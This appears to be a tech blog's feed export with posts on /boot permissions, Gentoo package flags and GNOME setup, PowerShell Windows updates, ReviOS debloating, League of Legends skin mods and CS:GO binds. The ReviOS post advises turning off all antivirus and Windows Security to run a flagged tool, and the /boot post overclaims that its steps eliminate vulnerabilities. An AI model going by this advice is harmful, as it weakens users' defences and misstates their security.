&gt;I THINK, `/BOOT` PATH SHOULD ONLY BE ABLE FOR ROOT USER ACCESS. EVEN ONLY READ NOT WRITE.

### So what should you do now?

just changing the permissions for your `/boot` directory. Here&apos;s how to do!

## FAT32

If the bootloader path is formatted to fat32, changing the permission may not be a simple task. To address this, fstab editing with additional options is necessary. Here&apos;s how:

### Step 1: Edit fstab Configuration

1. Open the fstab configuration file using your preferred text editor (for instance, vim).

   ```shell
   sudo vim /etc/fstab
   ```

2. Add `fmask=0137,dmask=0027` to the `/boot` partition options as shown:

```shell
# /dev/sda1

UUID=xxxx-xxxx      /boot       vfat        rw,relatime,fmask=0137,dmask=0027,errors=remount-ro     0 2
```

3. Save the file and exit the editor.

### Step 2: Adjust Permissions

FStab is a table that identifies which partition should initiate automatically when the system boots up.

If you do not restart your system after applying changes, your system will remain in its previous state. This table is loaded during system boot-up.

1. Reboot your system to apply the changes made in the fstab configuration.

2. After rebooting, change the permissions for the random seed file to restrict world access.

   ```shell
   sudo chmod o-rwx /boot/loader/random-seed
   ```

3. Similarly, ensure the `/boot` directory is secure by adjusting its permissions.

   ```shell
   sudo chmod o-rwx /boot
   ```

4. Now, after updating bootctl as shown below, attempt to access the `/boot` directory as a normal user. You will no longer be able to access this directory, making it safe now!

    ```shell
    $ sudo bootctl --path=/boot/ install

    [sudo] password for user:
    Copied &quot;/usr/lib/systemd/boot/efi/systemd-bootx64.efi.signed&quot; to &quot;/boot/EFI/systemd/systemd-bootx64.efi&quot;.
    Copied &quot;/usr/lib/systemd/boot/efi/systemd-bootx64.efi.signed&quot; to &quot;/boot/EFI/BOOT/BOOTX64.EFI&quot;.
    Random seed file /boot/loader/random-seed successfully refreshed (32 bytes).
    Created EFI boot entry &quot;Linux Boot Manager&quot;.
    ```

## Conclusion

By following these steps, you have successfully eliminated the security vulnerabilities in systemd-boot. Your Linux system is now shielded from unauthorized access, enhancing the overall security of your computing environment. Stay vigilant and proactive in maintaining your system&apos;s security to enjoy a seamless and protected Linux experience.

## Reference

- [bootctl install” outputs some warnings about /efi mount point and random seed file in the terminal](https://forum.endeavouros.com/t/bootctl-install-outputs-some-warnings-about-efi-mount-point-and-random-seed-file-in-the-terminal/43991)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Gentoo Linux: Some common problem with package installing</title><link>https://ummit.dev//posts/linux/distribution/gentoo/gentoo-common-problem-with-custom-package/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/gentoo/gentoo-common-problem-with-custom-package/</guid><description>In this article, we&apos;re going to talk about how to solve package installation problems on gentoo, such as package.use this common problem.</description><pubDate>Sat, 28 Oct 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

As is widely known, Gentoo is a customizable Linux distribution. This means that command line operations and custom package editing are crucial. In contrast to other distributions, like Arch, which rely on developer presets, Gentoo permits greater flexibility. You do not need to set this up. Simply installing it is sufficient. However, on Gentoo, there may be situations where customizing a package is necessary in order to install it. This is different. In this guide, I will explain how you can solve this common problem when installing certain packages on Gentoo.

In addition, I believe that in Gentoo articles, it is not suitable to use hardcoded styles for writing blogs because Gentoo is highly customized. One needs to consider what their current code looks like. That is why I have written this blog to discuss how to solve common problems.

### Problem: Package Use Customization

In Gentoo, the ability to customize your system extensively is one of its core strengths. Package use flags are a fundamental aspect of this customization. They allow you to enable or disable specific features or dependencies for packages during installation. However, occasionally, you might encounter situations where a package&apos;s default use flags don&apos;t align with your requirements.

### Solution: Customizing Package Use Flags

To address this issue, you can customize package use flags by modifying the `package.use` file. Here&apos;s a breakdown of the provided command:

```shell
echo &quot;&gt;=media-plugins/alsa-plugins-1.2.7.1-r1 pulseaudio&quot; &gt; /etc/portage/package.use/alsa-plugins
```

In this command:

- `&gt;=media-plugins/alsa-plugins-1.2.7.1-r1`: Specifies the package and version for which the use flag is being set.
- `pulseaudio`: Indicates the specific use flag being enabled. In this case, it enables support for the PulseAudio sound server.

#### More Explanation:

- **Understanding Use Flags:**
  - Use flags are keywords that represent specific features or options associated with packages.
  - Enabling a use flag means allowing the package to incorporate the associated feature during installation.

- **Choosing the Right Use Flags:**
  - It&apos;s crucial to research the correct use flags for your packages. Gentoo&apos;s documentation and package information provide details on available flags.

- **Multiple Use Flags:**
  - You can specify multiple use flags for a package by separating them with spaces.
  - For example, to enable both `flag1` and `flag2`:
    ```shell
    echo &quot;category/package flag1 flag2&quot; &gt; /etc/portage/package.use/custom-file
    ```

By customizing package use flags, you ensure that packages are installed with the specific features and options you need. This level of fine-tuning is one of the reasons Gentoo remains a favorite among Linux enthusiasts and experts alike.

### Problem: Package Accept Keywords Customization

In Gentoo, package acceptance is governed by keywords, which denote stability levels for packages. Sometimes, you may need to accept specific versions of packages that are not yet marked as stable. Here&apos;s how to address this issue:

```shell
echo &quot;media-libs/libpulse ~amd64&quot; &gt;&gt; /etc/portage/package.accept_keywords/libpulse
```

In this command, we&apos;re adding a specific version of the `media-libs/libpulse` package to the accept keywords file. The `~amd64` keyword indicates that the package is accepted for the `amd64` architecture, but it might not be stable yet. By managing package accept keywords, you can control which package versions are available for installation.

### Additional Tips for Package Acceptance:

1. **Understanding Keywords:**
   - `~amd64`: Unstable package version for `amd64` architecture.
   - `amd64`: Stable package version for `amd64` architecture.
   - `~x86`: Unstable package version for `x86` architecture.
   - `x86`: Stable package version for `x86` architecture.

2. **Using Masking:**
   - You can mask a package to prevent its installation. For example:
     ```shell
     echo &quot;&gt;=media-libs/package-1.2.3&quot; &gt;&gt; /etc/portage/package.mask/package
     ```

Managing package accept keywords allows you to fine-tune your Gentoo system, ensuring that specific package versions are available for installation while maintaining control over stability levels. By customizing these keywords, you can tailor your Gentoo environment to your specific requirements.

## Reference

- [How to unmask this package?](https://www.reddit.com/r/Gentoo/comments/t64ge4/how_to_unmask_this_package/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Manually Updating Windows with PowerShell</title><link>https://ummit.dev//posts/windows/terminal/windows-update-with-powershell/</link><guid isPermaLink="true">https://ummit.dev//posts/windows/terminal/windows-update-with-powershell/</guid><description>Discover the power of PowerShell in managing Windows updates. This quick guide provides step-by-step instructions on how to manually update your Windows system.</description><pubDate>Sun, 15 Oct 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Even if you&apos;ve removed the built-in Windows Update GUI, there&apos;s still a way to keep your system up-to-date. PowerShell comes to the rescue, offering a robust module for manual Windows updates. This guide is tailored for scenarios where you&apos;ve disabled the native Windows update mechanisms and need a controlled method to ensure your system stays current

### Prerequisites

Before you begin, make sure you have PowerShell installed on your system. Most modern versions of Windows come with PowerShell pre-installed. Additionally, ensure you have the PSWindowsUpdate module installed. If you don&apos;t have it yet, you can install it using the following command in PowerShell:

```powershell
Install-Module -Name PSWindowsUpdate -Force -SkipPublisherCheck
```

## Step 1: Checking Available Updates

You can start by checking for available updates on your system. Use the following command to view the available updates:

```powershell
Get-WindowsUpdate
```

This command will display a list of available updates, allowing you to see what needs to be installed.

## Step 2: Installing Updates

To install updates, you can use the `Install-WindowsUpdate` cmdlet. Here&apos;s a basic command to install all available updates:

```powershell
Install-WindowsUpdate -MicrosoftUpdate -AcceptAll
```

In this command, `-MicrosoftUpdate` ensures you&apos;re getting updates from Microsoft, and `-AcceptAll` installs all available updates without prompting for confirmation.

## Step 3: Controlling Reboots

Managing reboots after installing Windows updates is crucial to ensure a smooth and uninterrupted user experience. PowerShell provides options to control the reboot behavior according to your preferences.

### Automatic Reboot (Default Behavior)

By default, Windows updates usually trigger an automatic reboot to apply the changes. If you want to retain this default behavior, you can use the following command:

```powershell
Install-WindowsUpdate -MicrosoftUpdate -AcceptAll -AutoReboot
```

Adding the `-AutoReboot` parameter ensures that your system will automatically restart after the updates are installed, eliminating the need for manual intervention.

### Manual Reboot

However, there might be scenarios where you prefer to reboot your system at a more convenient time, especially if you are in the middle of important tasks. To prevent an immediate reboot after updates, you can use the `-IgnoreReboot` parameter:

```powershell
Install-WindowsUpdate -MicrosoftUpdate -AcceptAll -IgnoreReboot
```

Using `-IgnoreReboot` disables the automatic reboot, giving you the flexibility to manually restart your system when it&apos;s convenient for you. This option allows you to complete your work or save your progress before applying the updates.

## Conclusion

This quick guide should help some people who remove windows updates altogether or want to update windows using the command line. However, updating using powershell will be faster than updating using the built-in GUI.

## Reference

- [How to Install Windows Updates with PowerShell? [Tutorial]](https://www.partitionwizard.com/partitionmagic/powershell-windows-update.html)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Customize Windows 10/11 with ReviOS</title><link>https://ummit.dev//posts/windows/custom/revios/</link><guid isPermaLink="true">https://ummit.dev//posts/windows/custom/revios/</guid><description>Discover the power of ReviOS, an open-source solution to streamline your Windows 10/11 experience. Say goodbye to unnecessary bloatware and become a more efficient system.</description><pubDate>Wed, 11 Oct 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Windows operating systems often come with a lot of pre-installed software, which can significantly slow down your computer&apos;s performance. Despite attempting to remove them, these unwanted programs tend to reappear after a while. This is a common issue faced by many Windows users. However, there is a solution: ReviOS.

### How Can ReviOS Help?

In this article, I will introduce you to ReviOS, a program designed specifically for Windows 10/11 to strip down unnecessary elements from your installation, including applications like EDGE and Internet Explorer. By removing these programs, ReviOS can potentially double your Windows system’s speed. It achieves this by eliminating up to 70 built-in applications that often slow down your Windows 10/11 computer.

### What Exactly is ReviOS?

[ReviOS](https://revi.cc/) is an open-source software maintained by the community. Its primary goal is to create a customized version of Windows that offers improved performance. While Windows 10/11 doesn&apos;t inherently require powerful hardware, the presence of unnecessary built-in software can demand more resources, affecting your system&apos;s speed. ReviOS aims to address this issue.

### Pre-Installation Steps

Before installing ReviOS, it&apos;s crucial to follow these steps:

1. Ensure you have a fresh Windows installation.
2. Update your new Windows installation.
3. Install ReviOS after completing the updates.

Now, let&apos;s proceed with the installation process.

## Step 1: Download Required Files

Visit the [ReviOS website](https://revi.cc/revios/download) and download two essential software:

1. **AME Wizard**: Click the download button on the [AME Wizard page](https://ameliorated.io/).

   ![AME Wizard](./Download-tools/AME Wizard.png)

2. **ReviOS Playbook**: Download the `apbx` file from the [ReviOS Playbook GitHub release page](https://github.com/meetrevision/playbook/releases).

   ![ReviOS playbook](./Download-tools/ReviOS-playbook.png)

AME Wizard acts as an injector, allowing you to modify your Windows system. ReviOS is the program you&apos;ll inject into it. Now, let&apos;s move on to the installation steps.

## Step 2: Launch the AME Wizard

Start the AME Wizard program. You might need administrative permissions, so click &quot;Yes&quot; when prompted.

&gt; **Note**: Windows Defender might flag this program as harmful, leading to its closure. To proceed, disable all antivirus settings. You will also be asked to close the antivirus during the next step. Whether you do it now or later doesn&apos;t matter; just ensure it&apos;s closed before continuing.

   ![select playbook](./Download-tools/Select-playbook.png)

## Step 3: Inject ReviOS Playbook into AME Wizard

Drag and drop the downloaded `apbx` file into AME Wizard and click &quot;Next.&quot;

   ![Disable windows security](./Disable/Disable-windows-security.png)

## Step 4: Disable Windows Security

As mentioned earlier, turn off all Windows security settings. Click &quot;Next&quot; once all security options turn gray.

   ![Disable windows security-2](./Disable/Disable-windows-security-2.png)

## Step 5: Verify Windows Build Requirements

Wait for the playbook to validate your Windows version.

   ![Verifying windows](./verifying/verifying.png)

After validation, if the program confirms that your system meets the playbook&apos;s requirements, click &quot;Next.&quot;

   ![Verifying windows-2](./verifying/verifying-2.png)

## Step 6: Accept the License Agreement

Read the license agreement on this page. click &quot;Next.&quot;

   ![License](./License/License.png)

Click &quot;Agree.&quot;

   ![License-2](./License/License-2.png)

## Step 7: Customize Features (Optional)

ReviOS offers several customization features in this step. If you don&apos;t wish to customize, simply click &quot;Next.&quot; However, let&apos;s explore the options. Click &quot;Select Features.&quot;

   ![Select features](./Select-features/Select-features.png)

The first feature allows you to choose your preferred browser.

   ![Select features 2](./Select-features/Select-features-2.png)

Select the components you want to install or remove. It&apos;s recommended to select all components. Once done, click &quot;OK.&quot;

   ![Select features 3](./Select-features/Select-features-3.png)

After confirming your choices, click &quot;Next.&quot;

   ![Select features 4](./Select-features/Select-features-4.png)

## Step 8: Apply Changes

Wait for the playbook to complete the process. The option to automatically restart the system is selected by default. If you don&apos;t choose this option, restart manually after the process finishes.

&gt; **Note**: Do not perform any actions until the process completes. Be patient in case of any unexpected issues.

   ![apply](./apply/apply.png)
   ![apply 2](./apply/apply-2.png)
   ![apply 3](./apply/apply-3.png)

## Step 9: Completion

After restarting your system, you&apos;ll notice the changes, including the new wallpaper!

   ![finish](./done/finish.png)

### Process Optimization

Check Task Manager to observe the reduced number of running processes. ReviOS dramatically reduces the count; originally, there could be up to 130 processes. The reduction ratio is approximately 2.28, meaning the program has halved the number of processes.

   ![Processes](./done/Processes.png)

### Revision Tool

After installing ReviOS, you&apos;ll find a program called Revision Tool. This tool allows further customization, such as enabling updates and Windows Defender. These settings are entirely up to you.

   ![Revision Tool](./Revision-Tools/Revision Tool.png)
   ![Revision Tool-2](./Revision-Tools/Revision Tool-2.png)
   ![Revision Tool-3](./Revision-Tools/Revision Tool-3.png)

## Is ReviOS Recommended?

I have previously used AtlasOS, but it didn&apos;t work well for me. The main issue was its complete removal of the Windows update function. Some Windows programs require updates for proper installation. ReviOS, however, allows you to enable updates instead of removing the function entirely.

Overall though, I think ReviOS is the most balanced, you don&apos;t need to customize it too much because the default installation is already what most people want. Just like out of the box</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Comprehensive Guide to Gentoo Linux: Installing GNOME, Wayland and GDM with OpenRC</title><link>https://ummit.dev//posts/linux/distribution/gentoo/gentoo-gnome-wayland-gdm/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/gentoo/gentoo-gnome-wayland-gdm/</guid><description>Learn how to set up GNOME on your Gentoo system with Wayland and the GDM display manager. Follow these steps to configure your environment for a seamless GNOME experience.</description><pubDate>Tue, 26 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the previous article, I demonstrated how to install XFCE. and in this comprehensive guide will walk you through the process of installing and configuring GNOME on your Gentoo system. (As shown in the image below):

![gnome-gentoo](./neofetch.png)

## Step 1: Select Your Profile

The first step is selecting the profile. Gentoo offers various profiles to cater to different needs. To see the available profiles, run the following command:

```shell
eselect profile list
```

Browse the list and identify the one that matches your requirements. Typically, you&apos;ll find a profile like `default/linux/amd64/17.1/desktop/gnome (stable).` Once you&apos;ve pinpointed your choice, set it as your active profile. Replace the number `6` with the corresponding number from your list:

```shell
eselect profile set 6
```

## Step 2: Configuring make.conf for GNOME Installation

With your chosen Gentoo profile set, it&apos;s time to fine-tune your system to ensure a flawless GNOME installation. This step involves configuring your `make.conf` file, which plays a pivotal role in managing package compilation and runtime behavior. Follow these instructions to adjust the necessary settings:

### 1. Open your `make.conf` file

Begin by opening your `make.conf` file in a text editor. You can utilize the &quot;nano&quot; text editor for this task:

```shell
nano /etc/portage/make.conf
```

### 2. Modify your USE flags

Inside the `make.conf` file, you&apos;ll find a section for your USE flags. Modify this section to include the following flags, which are essential for an optimized GNOME installation:

```shell
USE=&quot;... wayland gtk gnome dbus elogind minimal -X&quot;
INPUT_DEVICES=&quot;libinput&quot;
VIDEO_CARDS=&quot;qxl&quot;
```

Let&apos;s delve into the purpose of each USE flag:

- **wayland:** Enabling this flag extends support for the Wayland display protocol, a contemporary alternative to the aging X11.

- **gtk:** Inclusion of this flag guarantees compatibility with the GTK toolkit, a fundamental requirement for running GNOME applications.

- **gnome:** The presence of this flag communicates your intent to install GNOME, prompting the system to fetch the necessary dependencies.

- **dbus:** Activation of D-Bus support is crucial for establishing seamless communication between applications and the GNOME desktop environment.

- **elogind:** Enabling this flag ensures proper integration with elogind, a critical component for managing user sessions in Gentoo.

- **minimal:** Opting for a minimal installation ensures that only essential GNOME components are included, effectively sidestepping unnecessary bloat.

- **-X:** The exclusion of the `-X` flag signifies that you&apos;re not enabling X Window System compatibility, as Wayland serves as the primary display protocol.

By meticulously configuring these variables within your `make.conf` file using the provided settings, you&apos;re effectively preparing your system&apos;s package management system for a seamless GNOME installation. Each flag serves a distinct purpose, collectively ensuring that GNOME functions optimally within the Gentoo ecosystem.

### 3. Save your changes

After making these modifications, save the changes to your `make.conf` file. In the &quot;nano&quot; text editor, you can typically save changes by pressing &quot;Ctrl + O&quot; and then confirming the file name with &quot;Enter.&quot; To exit the editor, press &quot;Ctrl + X.&quot;

By meticulously configuring these variables within your `make.conf` file using the provided settings, you&apos;re effectively preparing your system&apos;s package management system for a seamless GNOME installation. Each flag serves a distinct purpose, collectively ensuring that GNOME functions optimally within the Gentoo ecosystem.

## Step 3: Set Package Versions

To proceed smoothly with the installation, we need to specify the versions of certain packages. This step helps ensure compatibility. Run the following commands to set the desired package versions.

&gt;IMPORTANT: Again, the versions are not necessarily the same, this is just a demonstration of the current version of the commands. To find out what version you need, just run the install gnome base once.

```shell
echo &quot;&gt;=media-libs/clutter-1.8.4-r1 X&quot; &gt; /etc/portage/package.use/clutter
echo &quot;&gt;=gui-libs/gtk-4.10.5 X&quot; &gt; /etc/portage/package.use/gtk
echo &quot;&gt;=x11-libs/gtk+-3.24.8:3.0 X&quot; &gt; /etc/portage/package.use/gtk+
echo &quot;&gt;=dev-cpp/gtkmm-3.24.8:3.0 X&quot; &gt; /etc/portage/package.use/gtkmm
echo &quot;&gt;=x11-base/xorg-server-21.1.8-r2 -minimal&quot; &gt; /etc/portage/package.use/xorg-server
```

## Step 4: Install GNOME Base

Now, let&apos;s install the GNOME base packages. Brace yourself; this process can be time-consuming, as it involves compiling over 400 packages. Just take a break :)

```shell
emerge --ask --verbose gnome-base/gnome
```

## Step 5: Update Environment and Profile

With GNOME base successfully installed, update your environment and profile settings to reflect the changes:

```shell
env-update &amp;&amp; source /etc/profile
```

## Step 6: Enabling Elogind for Enhanced GNOME Experience

Elogind is a vital component that enhances your GNOME desktop environment, ensuring a seamless and feature-rich experience. It provides essential services for managing user sessions, enabling features like auto-login and power management. Here&apos;s how to enable Elogind:

### Add Elogind to the System Startup

Begin by adding Elogind to your system&apos;s startup processes. This ensures that Elogind launches with your system during boot-up. Execute the following command:

```shell
rc-update add elogind boot
```

### Start Elogind Now

You can initiate Elogind immediately using the following command:

```shell
rc-service elogind start
```

Enabling Elogind is a crucial step in preparing your Gentoo system to deliver a flawless GNOME desktop experience. Its role in managing user sessions is pivotal, and it paves the way for the activation of various GNOME features.

## Step 7: Installing the Display Manager Initialization Script

To finalize your GNOME setup, you&apos;ll need to install the display manager initialization script. This script ensures that your GNOME desktop environment starts efficiently and securely with each system boot:

```shell
emerge --ask --noreplace gui-libs/display-manager-init
```

## Step 8: Configuring the Display Manager

To make GDM (GNOME Display Manager) the default display manager for your system, a quick configuration change is required. Follow these steps:

### Open the Configuration File

Use the nano text editor to open the configuration file for editing:

```shell
nano /etc/conf.d/display-manager
```

### Set GDM as the Default Display Manager

Within the file, locate the `DISPLAYMANAGER` variable and set it to &quot;gdm&quot; like this:

```shell
DISPLAYMANAGER=&quot;gdm&quot;
```

### Ensure Automatic Start at Boot

To guarantee that GDM starts automatically during system boot, add it to the default runlevel with the following command:

```shell
rc-update add display-manager default
```

With these configurations in place, you&apos;re ready to start the display manager:

```shell
rc-service display-manager start
```

These final steps solidify GDM as your default display manager, ensuring a smooth and reliable GNOME desktop experience.

## Optional: Disabling GNOME Online Accounts

GNOME offers built-in options for seamlessly connecting your online accounts. However, if you prefer not to utilize this feature, you can easily disable it by adjusting your USE flags. Follow these steps to disable GNOME Online Accounts:

### Step 1: Open your `make.conf` file

To begin, open your `make.conf` file using a text editor. You can use the `nano` text editor for this purpose:

```shell
nano /etc/portage/make.conf
```

### Step 2: Modify your USE flags

Inside the `make.conf` file, locate the line containing your USE flags. Add &quot;-gnome-online-accounts&quot; to the list of flags, like so:

```shell
USE=&quot;... -gnome-online-accounts&quot;
```

This modification informs Gentoo not to include the GNOME Online Accounts feature during package installations.

### Step 3: Rebuild your packages

Apply the changes you&apos;ve made to your USE flags by rebuilding your packages. Use the following command:

```shell
emerge --ask --changed-use --update --deep @world
```

This command ensures that your system updates the packages and considers your modified USE flags.

### Step 4: Reboot your system

To activate these changes, simply reboot your Gentoo system. Once completed, you&apos;ll notice that the Online Account options have been removed from your GNOME desktop environment.

## Summary

Congratulations! You&apos;ve successfully installed GNOME on your Gentoo system. Enjoy your gentoo system!

## References

- [Gentoo wiki: Wayland](https://wiki.gentoo.org/wiki/Wayland)
- [Gentoo wiki: GNOME/Guide](https://wiki.gentoo.org/wiki/GNOME/Guide)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>League of Legends: A step-by-step guide to customizing skins using CSLOL Manager</title><link>https://ummit.dev//posts/games/lol/cslol-manager/</link><guid isPermaLink="true">https://ummit.dev//posts/games/lol/cslol-manager/</guid><description>Discover how to relive the nostalgia of old-school League of Legends by customizing your skins with CSLOL Manager. Follow these simple steps to transform your gaming experience.</description><pubDate>Sun, 24 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In this blog, we will explore how to customize your League of Legends (LoL) skins effortlessly using CSLOL Manager. You won&apos;t need to use any complex commands; it&apos;s all about user-friendly customization.

### What is CSLOL Manager?

CSLOL Manager allows you to apply custom skins created by the community to your League of Legends client. However, it&apos;s important to note that these skins are only visible to you; other players won&apos;t see your modified skins. In essence, it&apos;s a client-side modification that lets you personalize your LoL experience.

### Why Customize Your Skins?

League of Legends has evolved over time, and for some players, the nostalgia of the past versions still holds a special place. Customizing your skins can help recreate that old-school LoL experience, allowing you to relive the game&apos;s earlier days. It&apos;s not just about winning or losing; it&apos;s about cherishing the memories.

However, it&apos;s important to understand that the official developers won&apos;t revert to old skins. For them, progress means moving forward, and the past is left behind. But with CSLOL Manager, you have the power to modify LoL to your heart&apos;s content. Once you&apos;ve created your desired skins, CSLOL Manager makes it easy to apply them.

### Is There a Risk of Being Banned?

Changing champion skins in League of Legends does come with some uncertainty. It&apos;s about altering the visual elements of the game, which could potentially affect the game&apos;s outcome. Riot Games generally allows skin changes that don&apos;t impact gameplay.

However, there&apos;s a slight risk of account suspension in some cases. To stay safe, avoid changing skins that you&apos;ve paid for. Many players, including the author, have changed skins for years without facing any bans, so it&apos;s generally a safe practice.

### Is CSLOL Manager Safe?

CSLOL Manager is an open-source program, and you can even build it yourself from the source code. Using it this way is considered safer. As for the skins themselves, it depends on your trust level. You can test files for viruses if you have the means, as CSLOL Manager serves as a convenient way to download these skins. The files are hosted on platforms like MediaFire, so exercise caution based on your level of trust.

Now, let&apos;s delve into the steps to change your skins.

## Step 1: Install CSLOL Manager and Run the Program

CSLOL Manager is open-source software, not proprietary, and its code can be found on GitHub. [Here](https://github.com/LeagueToolkit/cslol-manager) is the link to the GitHub repository.

1. To download CSLOL Manager, click [here](https://github.com/LeagueToolkit/cslol-manager/releases/tag/2023-09-17-cb6885f) (as shown in the image below).

![Download CSLOL Manager](./download-cslol-manager.png)

2. After downloading the file, extract `cslol-manager-windows.exe` from the archive.

3. Run the program by clicking `.\cslol-manager\cslol-manager.exe`.

## Step 2: Set the LoL Path

Configuring the path to your League of Legends files is crucial for the skin changes to take effect.

1. Click the Settings icon.

![Change Path Settings 1](./Setting-PATH-1.png)

2. Click on &quot;CHANGE GAME FOLDER.&quot;

![Change Path Settings 2](./Setting-PATH-2.png)

3. Click &quot;BROWSE.&quot;

![Change Path Settings 3](./Setting-PATH-3.png)

4. Locate your LoL path. By default, it&apos;s often found at `Program Files\Riot Games\League of Legends\Game\League of Legends.exe` (if you haven&apos;t changed it).

![Change Path Settings 4](./Setting-PATH-4.png)

## Step 3: Find Your Favorite Skin on Killerskins or Runeforge

Websites like [Killerskin](https://killerskins.com/) and [Runeforge](https://www.runeforge.io/mods) host a variety of custom skins. Simply browse these websites to find a skin you like, and then download either the zip file or the *.fantome file.

As an example, let&apos;s download an [old jungle monsters](https://killerskins.com/frachlitz/mods/misc/jungle-creeps/old-jungle-monsters-rift-herald/) skin. You can find the download link [here](https://drive.google.com/file/d/1-ha5O7lo4ImbGKALrK9PzX-DaMYWf8OU/view).

## Step 4: Apply Your Skins

1. Switch back to the CSLOL Manager application.

2. Click &quot;Import New Mod.&quot;

![Import 1](./IMPORT-1.png)

3. Locate the downloaded skin file and click on it.

4. After importing, you should see it listed as shown below.

![Import 2](./IMPORT-2.png)

5. Enable the skin by checking the checkbox next to it.

6. Click &quot;RUN.&quot;

![Done](./Done.png)

7. You should now see the following message displayed: Status: Waiting for league match to start.

## Final Step: Test Your Skin

Now, Open your lol and then Match the game and you will see your modified skins mod.

&gt;Tips: To ensure the skin is working correctly, if you currently have the League of Legends client launched, Just restart your League of Legends client. and then open this again, After that you should now see the modified skin.

![Done](./Display.png)

## Impressions

Customizing League of Legends skins to resemble the old-school style brings back fond memories. Imagine Back to 2014 , with an item called &quot;Deathfire Grasp,&quot; playing as LeBlanc and executing the perfect combo to obliterate every opponent: `&lt;Deathfire Grasp&gt;&lt;Q&gt;&lt;R&gt;&lt;W&gt;&lt;E&gt;`. It didn&apos;t matter if they were a tank; it was a one-shot wonder.

Those days are long gone, but they remain preserved in my cherished memories. Haha ...

## References

- [Github: CSLOL Manager](https://github.com/LeagueToolkit/cslol-manager)
- [Home - KillerSkins](https://killerskins.com/)
- [MODS | RuneForge](https://www.runeforge.io/mods)
- [How To Install Custom Skins &amp; Maps In League of Legends](https://onion.tube/watch?v=BGVK4ZwGa6c)
- [Top 5 Removed Items from League of Legends [2017]](https://onion.tube/watch?v=5bo3G3avGNo)
- [[閒聊] 請問冥火之擁，當年有多強? - 看板 LoL - 批踢踢實業坊](https://www.ptt.cc/bbs/LoL/M.1693984221.A.B70.html)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Enhance Your CS:GO Gameplay with These Useful Commands!</title><link>https://ummit.dev//posts/games/counter-strike/go/csgo-useful-command/</link><guid isPermaLink="true">https://ummit.dev//posts/games/counter-strike/go/csgo-useful-command/</guid><description>Unlock the full potential of your CS:GO gameplay with these essential commands! From optimizing your crosshair to performing quick actions, these commands can give you the edge you need to succeed in the game.</description><pubDate>Sat, 23 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Counter-Strike: Global Offensive (CS:GO) is a highly competitive first-person shooter that demands precision and quick reflexes. To gain an edge in the game, mastering essential commands can be a game-changer. In this guide, we&apos;ll explore some valuable commands that can enhance your CS:GO gameplay.

## Enable developer console

Enabling the developer console in CS:GO allows you to access various commands and settings for customization and debugging. Here&apos;s how to enable the developer console, and here have two ways to enable developer console.

### Way 1: Through In-Game Settings

This method involves going into the game settings and enabling the developer console

1. **Launch CS:GO**: Open Steam, go to your library, and launch Counter-Strike: Global Offensive.

2. **Open the Game Settings**: Click on the gear icon in the bottom left corner of the main menu screen. This will open the game settings.

3. **Go to the Game Tab**: In the game settings, click on the &quot;Game&quot; tab on the left-hand side.

4. **Enable Developer Console**: Look for the &quot;Enable Developer Console (~)&quot; option. It&apos;s usually near the bottom of the list. Click the checkbox to enable it.

![](https://img.gurugamer.com/resize/740x-/2019/07/12/d0iuv-d53f.png)

5. **Apply Settings**: After enabling the developer console, make sure to click the &quot;Apply&quot; or &quot;OK&quot; button to save your changes.

6. **Access the Console**: To open the developer console while in-game, press the tilde key (~) on your keyboard. This key is usually located just below the Escape (Esc) key and to the left of the &quot;1&quot; key on most keyboards.

Once you’ve enabled the developer console, you can press the tilde key to ON/OFF console, and you’ll be able to enter various commands to customize your CS:GO experience.

### Way 2: Adding a Launch Option

You can enable the developer console by adding the `-console` launch option to CS:GO. Here&apos;s how to do it:

1. Open Steam.
2. Right-click on &quot;Counter-Strike: Global Offensive&quot; in your Steam library.
3. Select &quot;Properties.&quot;
4. In the &quot;General&quot; tab, click on the &quot;Set Launch Options&quot; button.
5. In the launch options box, type `-console`.
6. Click &quot;OK&quot; to save your changes.
7. Launch CS:GO, and the developer console will be enabled automatically.

Using either method works, so you can choose the one that you find more convenient.

Same, Once you’ve enabled the developer console, you can press the tilde key to ON/OFF console.

### 1. Clearing Bullet Decals on the Fly

```shell
bind shift &quot;+speed; r_cleardecals&quot;
```

One of the subtle yet effective commands in CS:GO is the ability to clear bullet decals from surfaces. By binding this action to your &quot;shift&quot; key, you can clean up bullet holes and blood splatters quickly, ensuring that your view remains unobstructed during intense firefights.

### 2. Perfect Your Jump Throws

```shell
alias &quot;+jumpthrow&quot; &quot;+jump; -attack&quot;; alias &quot;-jumpthrow&quot; &quot;-jump&quot;; bind alt &quot;+jumpthrow&quot;
```

Precise grenade throws are essential in CS:GO, and the &quot;+jumpthrow&quot; command can help you achieve consistency. Binding it to the &quot;alt&quot; key allows you to execute a perfect jump throw every time. This can be a game-changer when coordinating grenade throws with your team.

### 3. Quick Weapon and C4 Management

```shell
bind x &quot;use weapon_c4; drop&quot;
```

Efficiency in managing your weapons and the C4 explosive is crucial. Binding the &quot;x&quot; key to this command allows you to swiftly switch to your C4 and drop it, streamlining your actions during bomb plant scenarios.

### 4. Switch Your Weapon Hand Preference

```shell
bind mouse4 &quot;toggle cl_righthand 0 1&quot;
```

CS:GO offers players the option to choose their weapon hand preference, either right-handed or left-handed. By binding this command to the &quot;mouse4&quot; button, you can toggle between the two settings on the fly. Experiment with both to find the one that suits your aiming style best.

### 5. Adjust Crosshair Size for Different Weapons

```shell
bind 2 &quot;slot2 ; cl_crosshairsize 3&quot;
```

Maintaining a consistent crosshair size across all weapons can improve your accuracy. This command binds the &quot;2&quot; key to switch to your secondary weapon and simultaneously adjusts the crosshair size to &quot;3.&quot; Customize the crosshair size to match your preferences for various weapons.

## Conclusion

